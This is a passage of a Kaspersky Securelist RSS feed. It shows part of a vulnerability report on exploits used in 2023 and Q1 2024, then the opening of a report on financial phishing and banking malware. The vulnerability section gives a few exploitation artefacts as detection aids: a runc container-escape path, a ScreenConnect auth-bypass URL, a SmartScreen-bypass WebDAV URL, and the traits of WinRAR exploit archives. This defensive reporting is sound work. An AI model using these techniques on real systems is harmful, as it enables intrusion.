  162. <div id="attachment_112557" style="width: 972px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112557" class="size-full wp-image-112557" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png" alt="A dark web ad seeking an exploit for the CVE-2023-40477 vulnerability in WinRAR" width="962" height="535" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02.png 962w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-300x167.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-768x427.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-270x150.png 270w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-629x350.png 629w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-740x412.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-503x280.png 503w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155608/Vulnerability_report_2023__Q1_2024_02-800x445.png 800w" sizes="(max-width: 962px) 100vw, 962px" /></a><p id="caption-attachment-112557" class="wp-caption-text">A dark web ad seeking an exploit for the CVE-2023-40477 vulnerability in WinRAR</p></div>
  163. <div id="attachment_112558" style="width: 963px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112558" class="size-full wp-image-112558" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png" alt="A dark web ad seeking assistance in configuring a CVE-2023-28252 exploit for older Windows versions" width="953" height="608" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03.png 953w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-300x191.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-768x490.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-549x350.png 549w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-740x472.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-439x280.png 439w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06155648/Vulnerability_report_2023__Q1_2024_03-800x510.png 800w" sizes="(max-width: 953px) 100vw, 953px" /></a><p id="caption-attachment-112558" class="wp-caption-text">A dark web ad seeking assistance in configuring a CVE-2023-28252 exploit for older Windows versions</p></div>
  164. <h3 id="most-prevalent-exploits">Most prevalent exploits</h3>
  165. <p>We continuously monitor exploits published for various vulnerabilities, with a particular focus on critical ones. Our analysis of these exploits has allowed us to single out several categories of software that are of particular interest to malicious actors:</p>
  166. <ul>
  167. <li>Browsers;</li>
  168. <li>Operating systems (Windows, Linux, macOS);</li>
  169. <li>Microsoft Exchange servers and server components;</li>
  170. <li>Microsoft SharePoint servers and server components;</li>
  171. <li>The Microsoft Office suite;</li>
  172. <li>All other applications that fall outside the five categories above.</li>
  173. </ul>
  174. <p>Let&#8217;s see which software categories had the most critical vulnerabilities with working exploits in 2023 and Q1 2024.</p>
  175. <div class="js-infogram-embed" data-id="_/3GTp2brFdNLmDsvrvg0O" data-type="interactive" data-title="07 EN Vulnerability report graphs" style="min-height:;"></div>
  176. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The distribution of exploits for critical vulnerabilities by platform, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091149/07-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  177. <div class="js-infogram-embed" data-id="_/W4TJxSPFu2utI4NI3xWc" data-type="interactive" data-title="08 EN Vulnerability report graphs" style="min-height:;"></div>
  178. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The distribution of exploits for critical vulnerabilities by platform, Q1 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091036/08-en-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  179. <p>The data indicates that the software categories most affected by critical vulnerabilities with working exploits are:</p>
  180. <ul>
  181. <li>Operating systems;</li>
  182. <li>Browsers.</li>
  183. </ul>
  184. <p>However, in Q1 2024, we also observed a significant number of exploits targeting Exchange servers. Additionally, a substantial portion of exploits falls into the &#8220;other software&#8221; category. This is due to the variety of applications that users may have installed on their systems to handle business tasks.</p>
  185. <h2 id="vulnerability-exploitation-in-apt-attacks">Vulnerability exploitation in APT attacks</h2>
  186. <p>Exploiting software vulnerabilities is an integral component of nearly every APT attack targeting enterprise infrastructures. We analyzed available data on exploits used in APT attacks for 2023 and Q1 2024 to determine which software is most frequently exploited by attackers. Below are the vulnerabilities that APT groups leveraged the most in 2023 and Q1 2024.</p>
  187. <p><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs.png"></p>
  188. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The top 10 vulnerabilities exploited in APT attacks, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091057/10-en-ru-es-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  189. <p><img decoding="async" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs.png"></p>
  190. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>The top 10 vulnerabilities exploited in APT attacks, Q1 2024 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091046/09-en-ru-es-vulnerability-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  191. <p>The statistics presented above indicate that popular entry points for malicious actors currently are:</p>
  192. <ul>
  193. <li>Vulnerable remote access services like Ivanti or ScreenConnect.</li>
  194. <li>Vulnerable access control features like Windows SmartScreen.</li>
  195. <li>Vulnerable office applications. Notably, exploits for the Microsoft Office suite, which long held the top of the most-exploited list, were superseded by a WinRAR vulnerability in 2023.</li>
  196. </ul>
  197. <p>Therefore, we can conclude that APT groups mostly exploit vulnerabilities while gaining initial access to an infrastructure. In most cases, this involves either breaching the perimeter (for example, by exploiting vulnerable internet-facing services like VPNs and web applications) or exploiting office applications combined with social engineering (for example, by emailing infected documents or archives to company employees).</p>
  198. <h2 id="notable-q1-2024-vulnerabilities">Notable Q1 2024 vulnerabilities</h2>
  199. <p>This section deals with the most interesting vulnerabilities registered in Q1 2024.</p>
  200. <h3 id="cve-2024-3094-xz">CVE-2024-3094 (XZ)</h3>
  201. <p>A <a href="https://securelist.com/xz-backdoor-story-part-1/112354/" target="_blank" rel="noopener">backdoor</a> was discovered within the XZ data compression utility package in late March. Attackers inserted malicious code into the source code of the library responsible for handling archived data. This code, through a modified build procedure, ended up in the compiled library. Upon loading such a library, the malicious code would begin modifying functions in memory that are exported by certain distributions for SSH server operation, enabling the attackers to send commands to the infected server.</p>
  202. <p>The backdoor&#8217;s functionality is notable because the attackers managed to inject malicious algorithms into a popular library, a feat rarely accomplished in the history of open-source software. The attack also stands out for its complexity and the multi-stage infection process. No one but the author of the malicious code could have exploited the backdoor.</p>
  203. <h3 id="cve-2024-20656-visual-studio">CVE-2024-20656 (Visual Studio)</h3>
  204. <p>This vulnerability in Visual Studio lets a malicious actor elevate their privileges in the system. An attacker can leverage it to execute a DACL reset attack on Windows. A DACL (Discretionary Access Control List) is an access control list that defines the level of access users have to perform specific operations on an object. Resetting a DACL removes all restrictions on accessing system files or directories, so any users can do whatever they wish to these. The vulnerability is intriguing due to its exploitation algorithm.</p>
  205. <p>The exploit source code, which we analyzed, utilizes a method of redirecting the Visual Studio application debugging service from one directory to another through a symlink chain: DummyDir =&gt; Global\\GLOBALROOT\\RPC Control =&gt; TargetDir. Here, DummyDir is a publicly accessible directory created by the attacker, and TargetDir is the directory they want to gain access to. When the application debugging service is redirected from DummyDir to TargetDir, the latter inherits access settings identical to those of DummyDir.</p>
  206. <p>This method of employing symlinks to perform selective actions on protected files is quite challenging to prevent, as not all files within a system can be write-protected. This implies that it could potentially be used to exploit other vulnerabilities in the future. If a file or dependency used by the targeted OS service is identified and its modification restrictions are removed, the user can simply overwrite this file or dependency after the exploit runs. Upon the next launch, the attacker-injected code will execute within the compromised service, inheriting the same access level as the service itself.</p>
  207. <p>We are not currently aware of any cases of this vulnerability being leveraged in real-life attacks. However, it shares the same exploitation primitives with the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36874" target="_blank" rel="noopener">CVE-2023-36874</a>, which malicious actors began exploiting even before it was discovered.</p>
  208. <h3 id="cve-2024-21626-runc">CVE-2024-21626 (runc)</h3>
  209. <p>OS-level virtualization, or containerization, is widely employed today for application scaling and building fault-tolerant systems. Therefore, vulnerabilities within systems that manage containers are of critical importance.</p>
  210. <p>The vulnerability in question owes its existence to certain behavior of the fork system call in the Linux kernel. This system call&#8217;s characteristic feature is the method by which it launches a child process, which is copied from the parent process.</p>
  211. <p>This functionality allows for rapid application startup but also presents a risk that developers may not always consider. Process cloning implies that some data from the parent process may be accessible from the child process. If the application code fails to monitor such data, this can lead to a data disclosure vulnerability <a href="https://cwe.mitre.org/data/definitions/403.html" target="_blank" rel="noopener">CWE-403</a> – Exposure of File Descriptor to Unintended Control Sphere, according to the <a href="https://cwe.mitre.org/" target="_blank" rel="noopener">CWE category system</a>.</p>
  212. <p>CVE-2024-21626 is a case in point. The Docker toolkit uses the runc tool to create and run containers; therefore, a running container acts as a child process relative to runc. If you try accessing <em>/proc/self</em> directory from that container, you can obtain descriptors for all files opened by the runc process. Navigation of accessible resources and descriptors in Linux follows file system rules. Hence, attackers quickly started using the relative path to interpreters accessible to the parent process to escape the container.</p>
  213. <p>You can detect exploitation of this vulnerability by monitoring activity within a running container. The primary pattern observed during exploitation involves the container attempting to access the file system using the path:</p>
  214. <p style="text-align: center;font-size: 80%">/proc/self/cwd/../</p>
  215. <h3 id="cve-2024-1708-screenconnect">CVE-2024-1708 (ScreenConnect)</h3>
  216. <p>ConnectWise ScreenConnect is a remote desktop access tool. It comprises client-side applications running on user systems and a server used for client management. The server hosts a web application that contains the vulnerability in question.</p>
  217. <p>Access control is considered to be the most critical mechanism within web applications. It works only as long as every user-accessible function and parameter in the web application is monitored and validated before being used in the application&#8217;s algorithms. The request monitoring and control in ScreenConnect proved to be inadequate. An attacker could force the system to reset its settings by simply appending a &#8220;/&#8221; character to the original request URL like this: <span style="font-size: 80%">http://vuln.server/SetupWizard.aspx</span>. As a result, the adversary could gain access to the system with administrator privileges and exploit the server for malicious purposes.</p>
  218. <p>The vulnerability is being actively used by malicious actors. Therefore, we recommend that ScreenConnect users apply the patch released by the developers and configure firewall rules to restrict access to the server&#8217;s web interface.</p>
  219. <h3 id="cve-2024-21412-windows-defender">CVE-2024-21412 (Windows Defender)</h3>
  220. <p>The primary objective of most attacks targeting user systems is the execution of malicious commands. Attackers aim to accomplish this task through various methods, but the most popular and reliable approach involves launching a malicious file. To minimize the risk of unauthorized application launches, Windows employs a mechanism known as the <a href="https://learn.microsoft.com/en-us/windows/security/operating-system-security/virus-and-threat-protection/microsoft-defender-smartscreen/" target="_blank" rel="noopener">SmartScreen Filter</a>. SmartScreen checks websites that the user visits and files downloaded from the internet. When the check starts, the user sees a lock screen.</p>
  221. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112559" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png" alt="" width="666" height="248" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04.png 666w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160127/Vulnerability_report_2023__Q1_2024_04-300x112.png 300w" sizes="(max-width: 666px) 100vw, 666px" /></a></p>
  222. <p>Such a notification can prompt the user to reconsider whether they truly want to launch the application. Consequently, malicious actors are actively seeking ways to bypass this filter. CVE-2024-21412 represents one such method.</p>
  223. <p>Deceiving the security mechanism relies on a simple principle: if SmartScreen checks files downloaded from the internet, just trick the filter into believing that the file was already in the system at the time of launch.</p>
  224. <p style="text-align: center"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112560" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png" alt="" width="395" height="234" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05.png 395w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160146/Vulnerability_report_2023__Q1_2024_05-300x178.png 300w" sizes="(max-width: 395px) 100vw, 395px" /></a></p>
  225. <p>This can be achieved by interacting with a file stored in a network storage. In the vulnerability in question, the storage resides on a WebDAV server. The WebDAV protocol allows multiple users to simultaneously edit a file stored on the server, and Windows provides capabilities for automatic access to such storage. All that remains for attackers is to present the server to the system in the appropriate manner. For this purpose, they use the following file URL:</p><pre class="crayon-plain-tag">URL=file://ip_address@port/webdav/TEST.URL</pre><p>
  226. <h3 id="cve-2024-27198-teamcity">CVE-2024-27198 (TeamCity)</h3>
  227. <p>This vulnerability in the web interface of the TeamCity continuous integration tool allows access to features that should be restricted to authenticated users. You can detect exploitation by analyzing the standard logs that TeamCity generates in its working directory. The malicious pattern appears as follows:</p>
  228. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112561" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png" alt="" width="398" height="40" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06.png 398w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160323/Vulnerability_report_2023__Q1_2024_06-300x30.png 300w" sizes="(max-width: 398px) 100vw, 398px" /></a></p>
  229. <p>The improper handling of files with a blank name, as shown above, grants unauthorized attackers access to the server API.</p>
  230. <p>Malicious actors leverage this vulnerability as a way of gaining initial access to targeted systems. For more efficient exploitation monitoring, we recommend auditing accounts with access to the web interface.</p>
  231. <h3 id="cve-2023-38831-winrar">CVE-2023-38831 (WinRAR)</h3>
  232. <p>Although this vulnerability was discovered in 2023, we believe it warrants attention due to its popularity among malicious actors in both late 2023 and Q1 2024.</p>
  233. <p>This is how it works: when attempting to open a file inside an archive using the WinRAR GUI, the application also opens the contents of a folder with the same name if such a folder exists in the archive.</p>
  234. <p>Since attackers began exploiting the vulnerability, they have come up with several types of exploits that can have one of two formats:</p>
  235. <ul>
  236. <li>ZIP archives;</li>
  237. <li>RAR archives.</li>
  238. </ul>
  239. <p>The variations in malware and existing archives make it impossible to determine definitively whether an archive is an exploit. However, we can identify key characteristics of an exploit:</p>
  240. <ul>
  241. <li>The archive contains files whose names match those of subdirectories.</li>
  242. <li>At least one file name contains a space before the extension.</li>
  243. <li>The archive must contain an executable located inside the subdirectory.</li>
  244. </ul>
  245. <p>Here are examples of such files viewed in a hex editor. For a ZIP archive, the data looks like this:</p>
  246. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112562" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png" alt="" width="872" height="164" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07.png 872w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-300x56.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-768x144.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-740x139.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160415/Vulnerability_report_2023__Q1_2024_07-800x150.png 800w" sizes="(max-width: 872px) 100vw, 872px" /></a></p>
  247. <p>For RAR files, like this:</p>
  248. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112563" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png" alt="" width="861" height="575" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08.png 861w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-300x200.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-768x513.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-524x350.png 524w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-740x494.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-419x280.png 419w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06160437/Vulnerability_report_2023__Q1_2024_08-800x534.png 800w" sizes="(max-width: 861px) 100vw, 861px" /></a></p>
  249. <p>Attackers have learned to conceal exploit artifacts by protecting the archive with a password. In such cases, file paths may be encrypted, so the only way to detect an exploit would be through behavior analysis.</p>
  250. <h2 id="conclusions-and-advice">Conclusions and advice</h2>
  251. <p>In recent times, we have observed a continuous year-over-year increase in the number of registered vulnerabilities, accompanied by a rise in the availability of public exploits. Vulnerability exploitation is a crucial component of targeted attacks, with malicious actors typically focused on leveraging vulnerabilities extensively within the first few weeks following their registration and exploit publication. To stay safe, it is essential to respond promptly to the evolving threat landscape. Also, make sure that you:</p>
  252. <ul>
  253. <li>Maintain a comprehensive understanding of your infrastructure and its assets, paying particular attention to the perimeter. Knowledge of your own infrastructure is a fundamental factor in establishing any security processes.</li>
  254. <li>Implement a robust patch management system to promptly identify vulnerable software within your infrastructure and deploy security patches. Our <a href="https://www.kaspersky.com/small-to-medium-business-security/systems-management" target="_blank" rel="noopener">Vulnerability Assessment and Patch Management</a> and <a href="https://www.kaspersky.com/vuln-feed" target="_blank" rel="noopener">Kaspersky Vulnerability Data Feed</a> solutions can assist you in this endeavor.</li>
  255. <li>Use comprehensive security solutions that enable you to build a flexible and efficient security system. This system should encompass robust endpoint protection, early detection and suppression of attacks regardless of their complexity, access to up-to-date data on global cyberattacks, and basic digital literacy training for your We recommend our <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext___" target="_blank" rel="noopener">Kaspersky NEXT</a> suite of products for business protection as a solution that can be tailored to the needs and capabilities of any company size.</li>
  256. </ul>
  257. ]]></content:encoded>
  259. <wfw:commentRss>https://securelist.com/vulnerability-report-q1-2024/112554/feed/</wfw:commentRss>
  260. <slash:comments>0</slash:comments>
  263. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-scaled.jpg" width="2666" height="1500"><media:keywords>full</media:keywords></media:content>
  264. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-1024x576.jpg" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  265. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  266. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/07091710/sl-binary-padlock-danger-vulnerability-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  267. </item>
  268. <item>
  269. <title>Financial cyberthreats in 2023</title>
  270. <link>https://securelist.com/financial-threat-report-2023/112526/</link>
  271. <comments>https://securelist.com/financial-threat-report-2023/112526/#respond</comments>
  273. <dc:creator><![CDATA[Kaspersky]]></dc:creator>
  274. <pubDate>Mon, 06 May 2024 10:00:31 +0000</pubDate>
  275. <category><![CDATA[Publications]]></category>
  276. <category><![CDATA[Emotet]]></category>
  277. <category><![CDATA[Financial malware]]></category>
  278. <category><![CDATA[Fraud]]></category>
  279. <category><![CDATA[Google Android]]></category>
  280. <category><![CDATA[Microsoft Windows]]></category>
  281. <category><![CDATA[Mobile Malware]]></category>
  282. <category><![CDATA[Phishing]]></category>
  283. <category><![CDATA[QakBot]]></category>
  284. <category><![CDATA[Trojan Banker]]></category>
  285. <category><![CDATA[ZeuS]]></category>
  286. <category><![CDATA[Financial threats]]></category>
  287. <category><![CDATA[Mobile threats]]></category>
  288. <category><![CDATA[Spam and Phishing]]></category>
  289. <category><![CDATA[Windows malware]]></category>
  290. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112526</guid>
  291.  
  292. <description><![CDATA[In this report, we share our insights into the 2023 trends and statistics on financial threats, such as phishing, PC and mobile banking malware.]]></description>
  293. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Money is what always attracts cybercriminals. A significant share of scam, phishing and malware attacks is about money. With <a href="https://www.statista.com/outlook/fmo/digital-payments/worldwide#transaction-value" target="_blank" rel="noopener">trillions of dollars</a> of digital payments made every year, it is no wonder that attackers target electronic wallets, online shopping accounts and other financial assets, inventing new techniques and reusing good old ones. Amid the current threat landscape, Kaspersky has conducted a comprehensive analysis of the financial risks, pinpointing key trends and providing recommendations to effectively mitigate risks and enhance security posture.</p>
  294. <h2 id="methodology">Methodology</h2>
  295. <p>In this report, we present an analysis of financial cyberthreats in 2023, focusing on banking Trojans and phishing pages that target online banking, shopping accounts, cryptocurrency wallets and other financial assets. To gain an understanding of the financial threat landscape, we analyzed anonymized data on malicious activities detected on the devices of Kaspersky security product users and consensually provided to us through the Kaspersky Security Network (KSN).</p>
  296. <h2 id="key-findings">Key findings</h2>
  297. <h3 id="phishing">Phishing</h3>
  298. <ul>
  299. <li>Financial phishing accounted for 27.32% of all phishing attacks on corporate users and 30.68% of phishing attacks on home users.</li>
  300. <li>Online shopping brands were the most popular lure, accounting for 41.65% of financial phishing attempts.</li>
  301. <li>PayPal phishing accounted for 54.78% of pages targeting electronic payment system users.</li>
  302. <li>Cryptocurrency phishing saw a 16% year-on-year increase in 2023, with 5.84 million detections compared to 5.04 million in 2022.</li>
  303. </ul>
  304. <h3 id="pc-malware">PC malware</h3>
  305. <ul>
  306. <li>The number of users affected by financial malware for PCs dropped by 11% from 2022.</li>
  307. <li>Ramnit and Zbot were the prevalent malware families, together targeting over 50% of affected users.</li>
  308. <li>Consumers remained the primary target of financial cyberthreats, accounting for 61.2% of attacks.</li>
  309. </ul>
  310. <h3 id="mobile-malware">Mobile malware</h3>
  311. <ul>
  312. <li>The number of Android users attacked by banking malware increased by 32% compared to the previous year.</li>
  313. <li>Agent was the most active mobile malware family, making up 38% of all Android attacks.</li>
  314. <li>Users in Turkey were the most targeted, with 2.98% encountering mobile banking malware.</li>
  315. </ul>
  316. <h2 id="financial-phishing">Financial phishing</h2>
  317. <p>In 2023, online fraudsters continued to lure users to phishing and scam pages that mimicked the websites of popular brands and financial organizations. The attackers employed social engineering techniques to trick victims into sharing their financial data or making a payment on a fake page.</p>
  318. <p>This year, we analyzed phishing detections separately for users of our home and business products. Among phishing and scam pages blocked on the devices of business users, 27.32% were financial phishing pages (pages mimicking online banks, payment systems and online stores). For fake pages blocked on home devices, this number was even higher at 30.68%.</p>
  319. <div class="js-infogram-embed" data-id="_/boYLMQpWpL1GXYlETIxb" data-type="interactive" data-title="01 EN Financial report graphs" style="min-height:;"></div>
  320. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 organizations mimicked by phishing and scam pages that were blocked on business users&#8217; devices, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082640/01-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  321. <div class="js-infogram-embed" data-id="_/3ZS8RqMMAvJhiI8jSaTS" data-type="interactive" data-title="02 EN Financial report graphs" style="min-height:;"></div>
  322. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 organizations mimicked by phishing and scam pages that were blocked on home users&#8217; devices, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082651/02-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  323. <p>Overall, among the three major financial phishing categories, online store users (41.65%) were targeted the most, followed by banks (38.47%) and payment systems (19.88%).</p>
  324. <div class="js-infogram-embed" data-id="_/G18VozQq8HHirkKRgi8i" data-type="interactive" data-title="03 EN Financial report graphs" style="min-height:;"></div>
  325. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>Distribution of financial phishing pages by category, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082700/03-en-financial-report-graphs-1.png" target="_blank" rel="noopener">download</a>)</em></p>
  326. <h3 id="online-shopping-scams">Online shopping scams</h3>
  327. <p>Online stores were the most targeted category, comprising more than 40% (41.65%) of all financial phishing pages. Fraudsters impersonated popular online store websites, such as Amazon, eBay and Shopify, as well as brand websites and popular streaming services, such as Spotify and Netflix.</p>
  328. <div class="js-infogram-embed" data-id="_/BxtUdnoTTUPLTrkvt9aq" data-type="interactive" data-title="04 EN Financial report graphs" style="min-height:;"></div>
  329. <p style="text-align: center;font-style: italic;font-weight: bold;margin-top: -10px"><em>TOP 10 online shopping brands mimicked by phishing and scam pages, 2023 (<a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03155936/04-en-financial-report-graphs.png" target="_blank" rel="noopener">download</a>)</em></p>
  330. <p>The most frequently impersonated e-commerce site was Amazon, which was mimicked in more than one third (34%) of all online store phishing attempts. Apple came in second with 18.66% of fraudulent pages, followed by Netflix, with 14.71%.</p>
  331. <div id="attachment_112529" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112529" class="size-large wp-image-112529" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-1024x1017.png" alt="Sample of a phishing site that impersonates Amazon" width="1024" height="1017" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-1024x1017.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-300x298.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-150x150.png 150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-768x763.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-352x350.png 352w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-740x735.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03154626/Financial_report_2023_01-282x280.png 282w, 